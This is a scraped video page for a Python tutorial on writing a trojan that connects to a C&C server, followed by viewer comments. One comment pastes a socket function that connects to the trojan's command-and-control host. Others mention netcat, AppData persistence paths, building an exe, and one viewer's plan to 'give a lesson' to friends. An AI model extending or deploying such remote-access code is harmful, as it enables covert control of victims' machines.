Coding a trojan in Python

preview_player
Показать описание
On this video I show you guys how to create a trojan in python and connect to the C&C server.
Рекомендации по теме
Комментарии
Автор

naww bro made a 35 min video about how to make a trojan and still got less than 1k views, you deserve better man

ppstcle
Автор

Your really proffessional experienced and you are able to make good explanations. I think you should deserve to have more attention.

xbase
Автор

Congratulations indeed both for your professionalism and for the way you express things and make them understand to others, this channel deserves a lot!

CybrAlb
Автор

This video is so underrated it deserves more likes/views

MrM
Автор

The best explanation i find after watching a 100 video

deepthoughts
Автор

The author writes really cool code. Thanks a lot for the video

dbstudio
Автор

thank you for theaching us how to make an trojan

alvinwong
Автор

my friends keep trying to hack me soo I got to give theme a leson

abdolilah.
Автор

I just saw this I'm subscribing right now
But i want to as please does it really work many yt video dont really show it 😞

Thecipher
Автор

You is the best, bro you make my dreame for one video exactly you the best

dfgh-ylip
Автор

never gonna use any of this, still interesting. Nice Video!

slin
Автор

i need help it says "CCIP is not defined" i have prety much copied the entire script. Is there any mistakes in the following script:

def conn(CCIP, CCPORT):
try:
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((CCIP, CCPORT))
return client
except Exception as error:
print(error)

vikvri_cs
Автор

Is there a way to send files between server and client with it?

Hello-shxf
Автор

Blud just casually teaching us how to make a trojan and only get this little view?

hildenear
Автор

thank u a lot, im staring to learn how to program and i wanted to learn this, it is interesting but i´d like to know if it is impossible to do it in windows, i tried to run netcat in cmd but it doesnt work. Good work and good video!

Incxst
Автор

You n to convert it to exe on the Windows machine, then it will work there! Nice video anyways but please more english videos

Gzwut
Автор

what a pro ethical hacker. Can you give me the link to the pycharm

edrick
Автор

on 17:36 can anyone tell me what to write in stdout

SanAndreasChronicles-br
Автор

if i may ask, i have a question where did u get path \Appdata\\....etc
and __file__ throws an error

blurremittion
Автор

Hello mentor, need your help. I am trying to convert python code which has a SQLite3 connector to an exe file, but it shows an error file that contains virus and is unable to complete the process. I tried all the methods and stuck. I have an anaconda environment and a vscode setup. Since this is my first project I'm very disappointed. Kindly help in this regard.

alisheik